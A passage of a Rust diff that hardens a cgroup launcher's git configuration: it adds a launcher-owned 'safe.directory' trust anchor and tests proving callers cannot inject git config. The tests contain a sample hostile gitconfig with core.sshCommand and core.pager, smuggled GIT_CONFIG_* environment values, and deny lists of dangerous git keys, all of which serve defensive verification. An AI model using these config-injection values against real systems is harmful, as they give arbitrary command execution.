+        let dir = std::fs::symlink_metadata(path.parent().expect("anchor has a parent"))
+            .expect("stat anchor dir");
+        // The reader is uid 1001 and the writer is the launcher uid: without
+        // world-read the child cannot load the trust rule at all.
+        assert_eq!(file.mode() & 0o777, 0o644, "anchor must be world-readable");
+        assert_eq!(dir.mode() & 0o777, 0o755, "anchor dir must be traversable");
+        assert_eq!(
+            file.mode() & FORBIDDEN_DIR_WRITE,
+            0,
+            "the child must not be able to rewrite the anchor"
+        );
+        assert_eq!(file.uid(), effective_uid());
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    /// `OpenOptions::mode` and `DirBuilder::mode` are both masked by the process
+    /// umask. This repo has already shipped a umask-022 regression that broke
+    /// the warm path, so the anchor's readability may not depend on one.
+    #[test]
+    fn a_hostile_umask_cannot_make_the_anchor_unreadable() {
+        let root = temp_root("umask");
+        // SAFETY: `umask` cannot fail; restored before the test returns.
+        let previous = unsafe { libc::umask(0o077) };
+        let path = materialize_in(&root);
+        unsafe { libc::umask(previous) };
+        let path = path.expect("materialize under umask 077");
+        assert_eq!(
+            std::fs::symlink_metadata(&path)
+                .expect("stat anchor")
+                .mode()
+                & 0o777,
+            0o644
+        );
+        assert_eq!(
+            std::fs::symlink_metadata(path.parent().expect("parent"))
+                .expect("stat dir")
+                .mode()
+                & 0o777,
+            0o755
+        );
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    #[test]
+    fn the_anchor_grants_safe_directory_and_nothing_else() {
+        let contents = anchor_contents(None);
+        assert!(contents.contains("[safe]"));
+        assert!(contents.contains("directory = *"));
+        for dangerous in [
+            "sshCommand",
+            "pager",
+            "editor",
+            "credential",
+            "insteadOf",
+            "external",
+        ] {
+            assert!(
+                !contents.contains(dangerous),
+                "the anchor must never carry {dangerous}"
+            );
+        }
+    }
+
+    /// `GIT_CONFIG_SYSTEM` REPLACES `/etc/gitconfig`; a bare anchor would drop
+    /// whatever the image put there.
+    #[test]
+    fn the_anchor_chains_to_the_real_system_config_when_one_exists() {
+        let chained = anchor_contents(Some(Path::new("/etc/gitconfig")));
+        assert!(chained.contains("[include]"));
+        assert!(chained.contains("path = \"/etc/gitconfig\""));
+        assert!(
+            !anchor_contents(None).contains("[include]"),
+            "no include when there is nothing to chain to"
+        );
+    }
+
+    #[test]
+    fn a_directory_another_identity_could_write_is_refused() {
+        let root = temp_root("hostile-dir");
+        let planted = root.join(format!("djinn-launcher-git-{}", effective_uid()));
+        std::fs::create_dir(&planted).expect("plant directory");
+        std::fs::set_permissions(&planted, std::fs::Permissions::from_mode(0o777))
+            .expect("make it group/other-writable");
+        let error = materialize_in(&root).expect_err("a writable-by-others dir must be refused");
+        assert!(
+            error.to_string().contains("writable only by it"),
+            "unexpected error: {error}"
+        );
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    #[test]
+    fn a_symlink_where_the_directory_belongs_is_refused_without_being_followed() {
+        let root = temp_root("symlink");
+        let elsewhere = root.join("elsewhere");
+        std::fs::create_dir(&elsewhere).expect("create target");
+        std::os::unix::fs::symlink(
+            &elsewhere,
+            root.join(format!("djinn-launcher-git-{}", effective_uid())),
+        )
+        .expect("plant symlink");
+        assert!(materialize_in(&root).is_err());
+        assert!(
+            !elsewhere.join(ANCHOR_BASENAME).exists(),
+            "the symlink must not have been followed"
+        );
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    /// git ignores a `GIT_CONFIG_SYSTEM` pointing at a missing file silently, so
+    /// a reaper deleting it must not go unnoticed.
+    /// An `emptyDir` mounted at `/tmp` arrives `2777` — world-writable with no
+    /// sticky bit — so write permission on it is permission to rename a
+    /// root-owned directory out of the way. Measured on the production node.
+    #[test]
+    fn a_world_writable_scratch_root_regains_its_sticky_bit() {
+        let root = temp_root("sticky");
+        std::fs::set_permissions(&root, std::fs::Permissions::from_mode(0o2777))
+            .expect("model the rendered emptyDir mode");
+        materialize_in(&root).expect("materialize");
+        let mode = std::fs::symlink_metadata(&root).expect("stat").mode();
+        assert_eq!(
+            mode & MODE_STICKY,
+            MODE_STICKY,
+            "an other-writable scratch root we own must regain sticky semantics, or a \
+             child can displace the anchor directory (measured: `mv` succeeded at 2777, \
+             failed at 3777)"
+        );
+        assert_eq!(
+            mode & 0o2777,
+            0o2777,
+            "and nothing else about the mode may change"
+        );
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    /// Hardening a root we do NOT own is not ours to do, and failing there would
+    /// take out every brokered command.
+    #[test]
+    fn a_root_that_is_not_ours_or_is_already_sticky_is_left_alone() {
+        let already = temp_root("already-sticky");
+        std::fs::set_permissions(&already, std::fs::Permissions::from_mode(0o1777)).expect("chmod");
+        restore_sticky_scratch_semantics(&already);
+        assert_eq!(
+            std::fs::symlink_metadata(&already).expect("stat").mode() & 0o7777,
+            0o1777
+        );
+        // A private root is not other-writable and must not gain a sticky bit.
+        let private = temp_root("private");
+        std::fs::set_permissions(&private, std::fs::Permissions::from_mode(0o755)).expect("chmod");
+        restore_sticky_scratch_semantics(&private);
+        assert_eq!(
+            std::fs::symlink_metadata(&private).expect("stat").mode() & 0o7777,
+            0o755
+        );
+        // A path that is not a directory at all is a no-op, not a panic.
+        restore_sticky_scratch_semantics(Path::new("/dev/null"));
+        let _ = std::fs::remove_dir_all(&already);
+        let _ = std::fs::remove_dir_all(&private);
+    }
+
+    #[test]
+    fn a_deleted_anchor_is_re_materialized() {
+        let root = temp_root("reaper");
+        let path = materialize_in(&root).expect("materialize");
+        std::fs::remove_file(&path).expect("simulate a temp reaper");
+        assert!(!anchor_is_intact(&path));
+        let again = materialize_in(&root).expect("re-materialize");
+        assert_eq!(again, path);
+        assert!(anchor_is_intact(&path));
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    #[test]
+    fn the_production_anchor_is_stable_and_recognized_only_as_itself() {
+        let anchor = anchor_path().expect("the anchor must materialize in a test environment");
+        assert_eq!(anchor, anchor_path().expect("stable"));
+        assert!(is_anchor_value(&anchor.display().to_string()));
+        for impostor in [
+            "/workspace/.gitconfig",
+            "/home/djinn/.gitconfig",
+            "/etc/gitconfig",
+            "",
+        ] {
+            assert!(
+                !is_anchor_value(impostor),
+                "{impostor} must not pass as the launcher's anchor"
+            );
+        }
+    }
+}

--- a/server/crates/djinn-cgroup-launcher/src/lib.rs
+++ b/server/crates/djinn-cgroup-launcher/src/lib.rs
@@ -13,10 +13,11 @@ pub mod bootstrap;
 pub mod broker;
 pub mod child;
 pub mod env;
+pub mod git_trust;
 pub mod spawn;
 pub mod transport;
 
-pub use env::is_allowed_environment_key;
+pub use env::{is_allowed_environment_entry, is_allowed_environment_key};
 pub use spawn::{DenySpawn, NativeCgroupSpawn};
 
 const DEFAULT_PERIOD_US: u64 = 100_000;
@@ -227,7 +228,14 @@ impl CommandSpec {
             // `execve` receives each entry as `key=value`; accepting either
             // separator or NUL in the key would make that representation
             // malformed or change the key observed by the child.
-            if !is_allowed_environment_key(key) || key.contains(['\0', '=']) || value.contains('\0')
+            //
+            // The predicate is over the whole ENTRY, not the key: one forwarded
+            // name (`GIT_CONFIG_SYSTEM`) is a pointer to a configuration file,
+            // and admitting it by name would let a caller aim the child's git
+            // config at a file it wrote. See `env::is_allowed_environment_entry`.
+            if !is_allowed_environment_entry(key, value)
+                || key.contains(['\0', '='])
+                || value.contains('\0')
             {
                 return Err(Error::InvalidCommand);
             }
@@ -352,6 +360,13 @@ impl<F: CgroupFs, S: SpawnIntoCgroup> Launcher<F, S> {
             &mut command.environment,
             self.config.leased_quota.millicores(),
         );
+        // Give the child a git trust anchor the LAUNCHER owns. Without it every
+        // brokered `git` command in the worker-created workspace dies "dubious
+        // ownership" — the workspace is owned by the worker uid and the child is
+        // a different one. It is derived here, never accepted from the caller,
+        // for the same reason the parallelism pins are: only this side of the
+        // boundary knows a value that is safe to use. See `crate::git_trust`.
+        env::apply_git_trust_anchor(&mut command.environment, git_trust::anchor_path()?);
         command.validate()?;
 
         let fd = self.fs.create_direct_child(name)?;
@@ -527,6 +542,12 @@ pub enum Error {
     SpawnDenied,
     #[error("command request is malformed, over-budget, or outside the broker allow-list")]
     InvalidCommand,
+    #[error(
+        "could not establish the git trust anchor the child needs; without it every brokered \
+         git command in the worker-owned workspace fails \"detected dubious ownership\". The \
+         launcher needs a writable temp directory it alone owns (see git_trust)"
+    )]
+    GitTrustAnchorUnavailable,
     #[error("child process operation failed")]
     InvalidChild,
     #[error("fencing value does not match this invocation")]
@@ -1021,6 +1042,61 @@ mod tests {
                 .collect::<Vec<_>>(),
             vec![&("CARGO_BUILD_JOBS".to_string(), "4".to_string())]
         );
+    }
+
+    /// Every child is born with the launcher's own git trust anchor and no
+    /// other git configuration at all.
+    #[test]
+    fn the_child_environment_carries_the_launchers_git_trust_anchor() {
+        let mut l = launcher();
+        create(&mut l, "trusted");
+        let (_, spawn) = l.into_parts();
+        let anchor = git_trust::anchor_path()
+            .expect("anchor")
+            .display()
+            .to_string();
+        let git_entries: Vec<_> = spawn.environments[0]
+            .iter()
+            .filter(|(key, _)| key.starts_with("GIT"))
+            .collect();
+        assert_eq!(
+            git_entries,
+            vec![&(env::GIT_TRUST_ANCHOR_KEY.to_string(), anchor)],
+            "exactly one git variable reaches the child, and it is the launcher's anchor"
+        );
+    }
+
+    /// A caller aiming the child's SYSTEM git config at a file it controls is
+    /// arbitrary command execution (`core.sshCommand`). It is refused outright
+    /// rather than quietly corrected, and the refusal happens before any leaf or
+    /// child exists.
+    #[test]
+    fn a_caller_cannot_aim_the_childs_git_config_at_its_own_file() {
+        for (key, value) in [
+            (env::GIT_TRUST_ANCHOR_KEY, "/workspace/wt/.evil-gitconfig"),
+            ("GIT_CONFIG_COUNT", "1"),
+            ("GIT_CONFIG_KEY_0", "core.sshCommand"),
+            ("GIT_CONFIG_VALUE_0", "/workspace/wt/pwn.sh"),
+            ("GIT_CONFIG_NOSYSTEM", "1"),
+            ("GIT_CONFIG_GLOBAL", "/workspace/wt/.evil-gitconfig"),
+        ] {
+            let mut l = launcher();
+            let mut spec = command();
+            spec.environment = vec![(key.to_owned(), value.to_owned())];
+            assert!(
+                matches!(
+                    l.create_command("hostile", invocation(), &spec),
+                    Err(Error::InvalidCommand)
+                ),
+                "{key}={value} must be refused"
+            );
+            let (fs, spawn) = l.into_parts();
+            assert!(fs.created.is_empty(), "no leaf may be created for {key}");
+            assert!(
+                spawn.exec_calls.is_empty(),
+                "no child may be spawned for {key}"
+            );
+        }
     }
 
     #[test]

--- a/server/crates/djinn-cgroup-launcher/src/main.rs
+++ b/server/crates/djinn-cgroup-launcher/src/main.rs
@@ -98,6 +98,17 @@ fn run() -> Result<(), MainError> {
         LauncherConfig::new(Some(unleased), Some(leased), expected_uid)?,
     )?;
 
+    // Readiness gate 4 — the git trust anchor. A brokered child runs as a uid
+    // that owns none of the pod's volumes, so without a protected-scope
+    // `safe.directory` rule EVERY git command it runs dies "detected dubious
+    // ownership". The rule has to be a launcher-owned config file, both because
+    // the environment form is an arbitrary-config injection primitive and
+    // because git strips it from the inner child of `git clone --local` (nurw).
+    // Establishing it here means a launcher that cannot write its own anchor
+    // fails readiness instead of taking work and then failing every git command
+    // in it (task grkq). See `djinn_cgroup_launcher::git_trust`.
+    djinn_cgroup_launcher::git_trust::anchor_path()?;
+
     // Read the worker handshake (private credential + PID) the worker writes into
     // the shared IPC mount at startup. The broker binds every control to that
     // authenticated (pid, credential) pair.

--- a/server/crates/djinn-cgroup-launcher/tests/brokered_git_trust.rs
+++ b/server/crates/djinn-cgroup-launcher/tests/brokered_git_trust.rs
@@ -1,0 +1,769 @@
+//! The coverage whose absence hid goxi's sixth launcher blocker: a brokered
+//! child could not run `git` at all.
+//!
+//! # What went wrong, and why nothing caught it
+//!
+//! A task workspace is created by the worker (uid 1000). A brokered command runs
+//! as `CHILD_UID` (1001). git compares the repository directory's **owner uid**
+//! to the process uid — group ownership and mode do not enter into it — so the
+//! very first `git` command an armed pod ran was going to die:
+//!
+//! ```text
+//! # setpriv --reuid=1001 --regid=1000 --clear-groups git -C /workspace/wt status
+//! fatal: detected dubious ownership in repository at '/workspace/wt'
+//! ```
+//!
+//! `djinn-k8s`'s `job.rs` renders `GIT_CONFIG_COUNT`/`GIT_CONFIG_KEY_0`/
+//! `GIT_CONFIG_VALUE_0` = `safe.directory=*` onto the pod *specifically to fix
+//! this*, and the broker's environment allow-list stripped all three. The
+//! defect was two contracts disagreeing, and each side's tests were green.
+//!
+//! Five blockers preceded this one and **every one was invisible to a rendered
+//! manifest assertion**. So this file does not assert that a key appears in an
+//! env map. It builds a real repository, takes the environment out of the real
+//! `Launcher::create_command`, and runs real `git`.
+//!
+//! # Making the ownership check fire without being root
+//!
+//! git ships `GIT_TEST_ASSUME_DIFFERENT_OWNER`, the hook its own suite uses to
+//! force `ensure_valid_ownership()` down the failing branch. It reaches the same
+//! code — and the same `safe.directory` lookup in protected scope — that a real
+//! uid mismatch does, so the always-on proofs below run everywhere and fail
+//! rather than skip. The genuinely cross-uid version, with a real chowned
+//! worktree and a real `setresuid` to 1001, is the `#[ignore]`d half that the
+//! privileged `launcher-kernel-boundary` lane executes; the always-on
+//! [`the_privileged_git_proofs_are_wired_and_cannot_silently_skip`] guard makes
+//! a lane that runs zero of them a red build.
+
+use std::collections::BTreeSet;
+use std::io;
+use std::os::fd::RawFd;
+use std::os::unix::fs::PermissionsExt;
+use std::os::unix::process::CommandExt;
+use std::path::{Path, PathBuf};
+use std::process::Command;
+
+use djinn_cgroup_launcher::child::{ARTIFACT_GID, CHILD_UID};
+use djinn_cgroup_launcher::{
+    CgroupFs, CgroupMode, ChildProcess, CommandSpec, Error, Invocation, Launcher, LauncherConfig,
+    Readiness, SpawnIntoCgroup, git_trust, is_allowed_environment_entry,
+    is_allowed_environment_key,
+};
+
+/// The workflow job that must execute the `#[ignore]`d proofs below.
+const PRIVILEGED_LANE_JOB: &str = "launcher-kernel-boundary";
+/// Marker the lane uses to declare how many of them it expects to execute.
+const EXPECTED_PROOFS_KEY: &str = "GIT_TRUST_EXPECTED_PROOFS";
+
+/// git's own hook for exercising the dubious-ownership branch as any uid.
+const ASSUME_DIFFERENT_OWNER: &str = "GIT_TEST_ASSUME_DIFFERENT_OWNER";
+
+/// The exact production failure, by name.
+const PRODUCTION_FAILURE: &str = "detected dubious ownership";
+
+// ───────────────────────── the real composition seam ─────────────────────────
+
+/// Minimal cgroup seam: the environment under test must come out of the real
+/// `Launcher::create_command`, not be hand-assembled by the test.
+struct FakeFs {
+    next: RawFd,
+}
+
+impl CgroupFs for FakeFs {
+    fn readiness(&self) -> Result<Readiness, Error> {
+        Ok(Readiness {
+            mode: CgroupMode::V2,
+            root_writable: true,
+            owner_uid: unsafe { libc::geteuid() },
+            delegated_controllers: BTreeSet::from(["cpu".to_owned()]),
+        })
+    }
+    fn create_direct_child(&mut self, _: &str) -> Result<RawFd, Error> {
+        self.next += 1;
+        Ok(self.next)
+    }
+    fn write_leaf(&mut self, _: RawFd, _: &str, _: &str) -> Result<(), Error> {
+        Ok(())
+    }
+    fn read_leaf(&mut self, _: RawFd, _: &str) -> Result<String, Error> {
+        Ok("populated 0\n".to_owned())
+    }
+    fn remove_leaf(&mut self, _: RawFd, _: &str) -> Result<(), Error> {
+        Ok(())
+    }
+}
+
+/// Captures the environment the launcher decided to exec the child with.
+#[derive(Default)]
+struct CaptureSpawn {
+    environments: Vec<Vec<(String, String)>>,
+}
+
+impl SpawnIntoCgroup for CaptureSpawn {
+    fn spawn_into_cgroup(
+        &mut self,
+        _: RawFd,
+        _: &Invocation,
+        command: &CommandSpec,
+    ) -> Result<ChildProcess, Error> {
+        command.validate()?;
+        self.environments.push(command.environment.clone());
+        Ok(ChildProcess {
+            pid: 4242,
+            stdout: -1,
+            stderr: -1,
+        })
+    }
+}
+
+/// The environment a brokered child is really born with, for a command whose
+/// `cwd` is `workspace`.
+///
+/// `caller` is what the worker relayed — the same shape
+/// `process_broker::child_environment` produces, already filtered through the
+/// broker's own key predicate.
+fn brokered_environment(workspace: &Path, caller: &[(&str, &str)]) -> Vec<(String, String)> {
+    let mut launcher = Launcher::new(
+        FakeFs { next: 10 },
+        CaptureSpawn::default(),
+        LauncherConfig::new(Some(250), Some(4_000), unsafe { libc::geteuid() })
+            .expect("launcher config"),
+    )
+    .expect("launcher");
+    let spec = CommandSpec {
+        program: "/usr/bin/git".to_owned(),
+        argv: vec!["status".to_owned()],
+        // The rendered `cwd` is always under the workspace; the harness's real
+        // repository stands in for it.
+        cwd: "/workspace".to_owned(),
+        environment: caller
+            .iter()
+            .map(|(key, value)| ((*key).to_owned(), (*value).to_owned()))
+            .collect(),
+    };
+    launcher
+        .create_command("git-trust", invocation(), &spec)
+        .expect("the launcher must accept a conforming spec");
+    let (_, spawn) = launcher.into_parts();
+    let mut environment = spawn.environments.into_iter().next().expect("one spawn");
+    // The harness runs the child here rather than in a pod, so the one path the
+    // spec names has to point at the real fixture.
+    environment.push(("PWD".to_owned(), workspace.display().to_string()));
+    environment
+}
+
+fn invocation() -> Invocation {
+    Invocation {
+        id: "git-trust".to_owned(),
+        fence: 0x9017,
+    }
+}
+
+/// What `job.rs` renders onto a task-run pod today, filtered exactly as
+/// `process_broker::child_environment` filters it. Everything `GIT_*` falls out
+/// here — that IS the blocker.
+fn pod_environment(home: &Path) -> Vec<(String, String)> {
+    [
+        ("PATH", "/usr/local/bin:/usr/bin:/bin"),
+        ("HOME", &home.display().to_string()),
+        ("GIT_CONFIG_COUNT", "1"),
+        ("GIT_CONFIG_KEY_0", "safe.directory"),
+        ("GIT_CONFIG_VALUE_0", "*"),
+    ]
+    .into_iter()
+    .filter(|(key, _)| is_allowed_environment_key(key))
+    .map(|(key, value)| (key.to_owned(), value.to_owned()))
+    .collect()
+}
+
+// ───────────────────────────── real git harness ──────────────────────────────
+
+struct Fixture {
+    root: PathBuf,
+    repo: PathBuf,
+    home: PathBuf,
+}
+
+impl Fixture {
+    fn new(name: &str) -> Self {
+        let root = std::env::temp_dir().join(format!(
+            "djinn-brokered-git-{}-{name}-{}",
+            std::process::id(),
+            unsafe { libc::geteuid() }
+        ));
+        let _ = std::fs::remove_dir_all(&root);
+        let repo = root.join("wt");
+        let home = root.join("home");
+        std::fs::create_dir_all(&repo).expect("create worktree");
+        std::fs::create_dir_all(&home).expect("create home");
+        // A real repository, not a fixture directory: the ownership check runs
+        // during repository discovery and nowhere else.
+        let init = Command::new("git")
+            .args(["init", "--quiet", "."])
+            .current_dir(&repo)
+            .env_clear()
+            .env("PATH", "/usr/local/bin:/usr/bin:/bin")
+            .env("HOME", &home)
+            .output()
+            .expect("git must be installed to prove the git contract");
+        assert!(init.status.success(), "git init failed: {init:?}");
+        Self { root, repo, home }
+    }
+
+    /// Run `git <args>` in the worktree with exactly `environment`, plus the
+    /// hook that makes the ownership check fire for the current uid.
+    fn git(&self, environment: &[(String, String)], args: &[&str]) -> std::process::Output {
+        let mut command = Command::new("git");
+        command
+            .args(args)
+            .current_dir(&self.repo)
+            .env_clear()
+            .env(ASSUME_DIFFERENT_OWNER, "1");
+        for (key, value) in environment {
+            command.env(key, value);
+        }
+        command.output().expect("run git")
+    }
+
+    fn environment(&self, caller: &[(&str, &str)]) -> Vec<(String, String)> {
+        brokered_environment(&self.repo, caller)
+    }
+}
+
+impl Drop for Fixture {
+    fn drop(&mut self) {
+        let _ = std::fs::remove_dir_all(&self.root);
+    }
+}
+
+fn stderr(output: &std::process::Output) -> String {
+    String::from_utf8_lossy(&output.stderr).into_owned()
+}
+
+// ═════════ always-on: the real failure, and the real fix, with real git ══════
+
+/// NON-VACUITY. With the fix reverted — i.e. the environment the pod renders,
+/// filtered through the broker's key predicate exactly as it is today — real
+/// git reproduces the production failure BY NAME.
+#[test]
+fn without_the_launchers_anchor_real_git_reproduces_the_production_failure() {
+    let fixture = Fixture::new("reverted");
+    let reverted = pod_environment(&fixture.home);
+
+    assert!(
+        !reverted.iter().any(|(key, _)| key.starts_with("GIT_")),
+        "the blocker itself: the broker's key predicate drops every GIT_ variable \
+         the pod renders, so a brokered child gets no trust rule at all"
+    );
+
+    let output = fixture.git(&reverted, &["status", "--porcelain"]);
+    assert!(
+        !output.status.success() && stderr(&output).contains(PRODUCTION_FAILURE),
+        "the reverted environment must reproduce `{PRODUCTION_FAILURE}`; got \
+         status={:?} stderr={:?}",
+        output.status,
+        stderr(&output)
+    );
+}
+
+/// THE FIX. The environment the real `Launcher::create_command` produces lets
+/// real git operate on a worktree it does not own.
+#[test]
+fn the_brokered_child_environment_lets_real_git_work_in_a_foreign_worktree() {
+    let fixture = Fixture::new("fixed");
+    let environment = fixture.environment(&[
+        ("PATH", "/usr/local/bin:/usr/bin:/bin"),
+        ("HOME", &fixture.home.display().to_string()),
+    ]);
+
+    let output = fixture.git(&environment, &["status", "--porcelain"]);
+    assert!(
+        output.status.success(),
+        "the brokered environment must let git run: status={:?} stderr={:?}",
+        output.status,
+        stderr(&output)
+    );
+
+    // And it is the launcher's anchor doing it, in protected scope, rather than
+    // something the developer's own machine happened to have.
+    let scopes = fixture.git(&environment, &["config", "--list", "--show-scope"]);
+    let scopes = String::from_utf8_lossy(&scopes.stdout).into_owned();
+    assert!(
+        scopes
+            .lines()
+            .any(|line| line == "system\tsafe.directory=*"),
+        "safe.directory must arrive in SYSTEM scope — the only scope git honours \
+         it in, and the only one that survives into `git clone --local`'s inner \
+         `git-upload-pack` child (nurw). Scopes seen: {scopes}"
+    );
+}
+
+/// git ignores a `GIT_CONFIG_SYSTEM` that points at a missing file **silently**.
+/// A temp reaper would therefore bring the blocker back days into a pod's life
+/// with nothing in the logs, which is why the launcher re-materializes.
+#[test]
+fn a_reaped_anchor_fails_silently_and_is_re_materialized() {
+    let fixture = Fixture::new("reaper");
+    // A private anchor root: the process-global one is shared with every other
+    // test in this binary, and this proof deletes the file out from under it.
+    let root = fixture.root.join("anchor-root");
+    std::fs::create_dir(&root).expect("create anchor root");
+    let anchor = git_trust::materialize_in(&root).expect("materialize");
+    let environment = |anchor: &Path| {
+        vec![
+            ("HOME".to_owned(), fixture.home.display().to_string()),
+            (
+                git_trust::GIT_TRUST_ANCHOR_KEY.to_owned(),
+                anchor.display().to_string(),
+            ),
+        ]
+    };
+    assert!(
+        fixture
+            .git(&environment(&anchor), &["status"])
+            .status
+            .success(),
+        "control: the anchor works before it is reaped"
+    );
+
+    std::fs::remove_file(&anchor).expect("simulate a temp-directory reaper");
+    let reaped = fixture.git(&environment(&anchor), &["status", "--porcelain"]);
+    assert!(
+        !reaped.status.success() && stderr(&reaped).contains(PRODUCTION_FAILURE),
+        "git ignores a GIT_CONFIG_SYSTEM pointing at a missing file SILENTLY, so the \
+         blocker must come back with nothing in git's own output about the anchor: {:?}",
+        stderr(&reaped)
+    );
+
+    // Which is why every call re-establishes it, with no operator action.
+    let healed = git_trust::materialize_in(&root).expect("re-materialize");
+    assert_eq!(healed, anchor);
+    let after = fixture.git(&environment(&anchor), &["status", "--porcelain"]);
+    assert!(
+        after.status.success(),
+        "the launcher must heal its own anchor: {:?}",
+        stderr(&after)
+    );
+}
+
+/// `GIT_CONFIG_NOSYSTEM` makes git ignore the anchor outright. Its absence from
+/// the allow-list is load-bearing, not tidiness — proven by making git do it.
+#[test]
+fn nosystem_defeats_the_anchor_which_is_why_it_is_not_forwardable() {
+    let fixture = Fixture::new("nosystem");
+    let mut environment = fixture.environment(&[("HOME", &fixture.home.display().to_string())]);
+    assert!(fixture.git(&environment, &["status"]).status.success());
+
+    environment.push(("GIT_CONFIG_NOSYSTEM".to_owned(), "1".to_owned()));
+    let defeated = fixture.git(&environment, &["status", "--porcelain"]);
+    assert!(
+        !defeated.status.success() && stderr(&defeated).contains(PRODUCTION_FAILURE),
+        "GIT_CONFIG_NOSYSTEM must be shown to defeat the anchor, or the allow-list \
+         exclusion below is unmotivated: {:?}",
+        stderr(&defeated)
+    );
+    assert!(
+        !is_allowed_environment_key("GIT_CONFIG_NOSYSTEM")
+            && !is_allowed_environment_entry("GIT_CONFIG_NOSYSTEM", "1"),
+        "and therefore it must never be forwardable"
+    );
+}
+
+// ══════════════════ always-on: the security half, with real git ══════════════
+
+/// SECURITY. `core.sshCommand` and `core.pager` are arbitrary command
+/// execution. Neither can reach a brokered child through any git mechanism:
+/// not the env form, not a caller-chosen config file, and not the anchor.
+#[test]
+fn a_command_execution_config_key_cannot_reach_a_brokered_child() {
+    let fixture = Fixture::new("injection");
+    let marker = fixture.root.join("pwned");
+    // What an attacker would want the child's git to load.
+    let hostile = fixture.root.join("hostile-gitconfig");
+    std::fs::write(
+        &hostile,
+        format!(
+            "[safe]\n\tdirectory = *\n[core]\n\tsshCommand = /bin/touch {0}\n\tpager = /bin/touch {0}\n",
+            marker.display()
+        ),
+    )
+    .expect("write the hostile config");
+
+    // 1. The env form is refused outright, before any leaf or child exists.
+    for (key, value) in [
+        ("GIT_CONFIG_COUNT", "1"),
+        ("GIT_CONFIG_KEY_0", "core.sshCommand"),
+        ("GIT_CONFIG_VALUE_0", "/bin/touch /tmp/pwned"),
+        ("GIT_CONFIG_KEY_0", "core.pager"),
+    ] {
+        assert!(
+            !is_allowed_environment_entry(key, value),
+            "{key}={value} must not be forwardable"
+        );
+    }
+
+    // 2. Naming a file is refused too — that is the whole reason the anchor key
+    //    is admitted by VALUE and not by name.
+    assert!(
+        !is_allowed_environment_entry(
+            git_trust::GIT_TRUST_ANCHOR_KEY,
+            &hostile.display().to_string()
+        ),
+        "a caller must not be able to aim the child's SYSTEM git config at a file \
+         it wrote; that is arbitrary command execution"
+    );
+
+    // 3. Behaviourally: under the environment the launcher really produces, the
+    //    hostile file is inert even though it exists and is readable.
+    let environment = fixture.environment(&[
+        ("PATH", "/usr/local/bin:/usr/bin:/bin"),
+        ("HOME", &fixture.home.display().to_string()),
+    ]);
+    for key in ["core.sshCommand", "core.pager"] {
+        let resolved = fixture.git(&environment, &["config", "--get", key]);
+        assert!(
+            String::from_utf8_lossy(&resolved.stdout).trim().is_empty(),
+            "{key} must be unset for a brokered child, got {:?}",
+            String::from_utf8_lossy(&resolved.stdout)
+        );
+    }
+    assert!(!marker.exists(), "the hostile config must never have run");
+
+    // 4. And a caller cannot smuggle it in through the value the launcher pins:
+    //    a spec naming the hostile file is rejected, not silently corrected.
+    let rejected = brokered_spec_error(&[(
+        git_trust::GIT_TRUST_ANCHOR_KEY,
+        &hostile.display().to_string(),
+    )]);
+    assert!(
+        matches!(rejected, Error::InvalidCommand),
+        "expected InvalidCommand, got {rejected:?}"
+    );
+}
+
+/// The launcher's own anchor grants `safe.directory` and nothing else — proven
+/// by asking real git what the whole SYSTEM scope resolves to.
+#[test]
+fn the_anchor_grants_safe_directory_and_no_other_protected_setting() {
+    let fixture = Fixture::new("scope");
+    let environment = fixture.environment(&[("HOME", &fixture.home.display().to_string())]);
+    let listed = fixture.git(&environment, &["config", "--list", "--show-scope"]);
+    let system: Vec<String> = String::from_utf8_lossy(&listed.stdout)
+        .lines()
+        .filter_map(|line| line.strip_prefix("system\t").map(str::to_owned))
+        .collect();
+    // Whatever the host's own /etc/gitconfig contributes is chained through on
+    // purpose (a bare anchor would DROP it), so the assertion is that the
+    // launcher adds exactly one setting to it.
+    assert!(
+        system.contains(&"safe.directory=*".to_owned()),
+        "system scope must carry the trust rule: {system:?}"
+    );
+    for dangerous in [
+        "core.sshcommand",
+        "core.pager",
+        "core.editor",
+        "diff.external",
+        "credential.helper",
+    ] {
+        assert!(
+            !system.iter().any(|entry| entry.starts_with(dangerous)),
+            "the anchor must not introduce {dangerous}: {system:?}"
+        );
+    }
+}
+
+/// `GIT_CONFIG_SYSTEM` REPLACES `/etc/gitconfig` rather than adding to it, so
+/// the generated file has to chain. Proven with real git against a real chained
+/// file rather than by reading the generated text back.
+#[test]
+fn the_anchor_chains_the_real_system_config_instead_of_shadowing_it() {
+    let fixture = Fixture::new("chain");
+    let real_system = fixture.root.join("etc-gitconfig");
+    std::fs::write(&real_system, "[core]\n\tabbrev = 12\n")
+        .expect("write a stand-in system config");
+    let chained = fixture.root.join("chained-gitconfig");
+    std::fs::write(&chained, git_trust::anchor_contents(Some(&real_system)))
+        .expect("write the chained anchor");
+    std::fs::set_permissions(&chained, std::fs::Permissions::from_mode(0o644)).expect("chmod");
+
+    let environment = vec![
+        ("HOME".to_owned(), fixture.home.display().to_string()),
+        (
+            git_trust::GIT_TRUST_ANCHOR_KEY.to_owned(),
+            chained.display().to_string(),
+        ),
+    ];
+    let output = fixture.git(
+        &environment,
+        &["config", "--show-scope", "--get", "core.abbrev"],
+    );
+    assert_eq!(
+        String::from_utf8_lossy(&output.stdout).trim(),
+        "system\t12",
+        "the chained system config must still be read; a bare anchor would have \
+         silently dropped everything the image put in /etc/gitconfig"
+    );
+    assert!(
+        fixture.git(&environment, &["status"]).status.success(),
+        "and the trust rule must still apply through the chain"
+    );
+}
+
+fn brokered_spec_error(caller: &[(&str, &str)]) -> Error {
+    let mut launcher = Launcher::new(
+        FakeFs { next: 10 },
+        CaptureSpawn::default(),
+        LauncherConfig::new(Some(250), Some(4_000), unsafe { libc::geteuid() })
+            .expect("launcher config"),
+    )
+    .expect("launcher");
+    let spec = CommandSpec {
+        program: "/usr/bin/git".to_owned(),
+        argv: vec!["status".to_owned()],
+        cwd: "/workspace".to_owned(),
+        environment: caller
+            .iter()
+            .map(|(key, value)| ((*key).to_owned(), (*value).to_owned()))
+            .collect(),
+    };
+    launcher
+        .create_command("hostile", invocation(), &spec)
+        .expect_err("a hostile spec must be refused")
+}
+
+// ═══════════════ always-on: the privileged lane cannot silently skip ═════════
+
+#[test]
+fn the_privileged_git_proofs_are_wired_and_cannot_silently_skip() {
+    let source = std::fs::read_to_string(
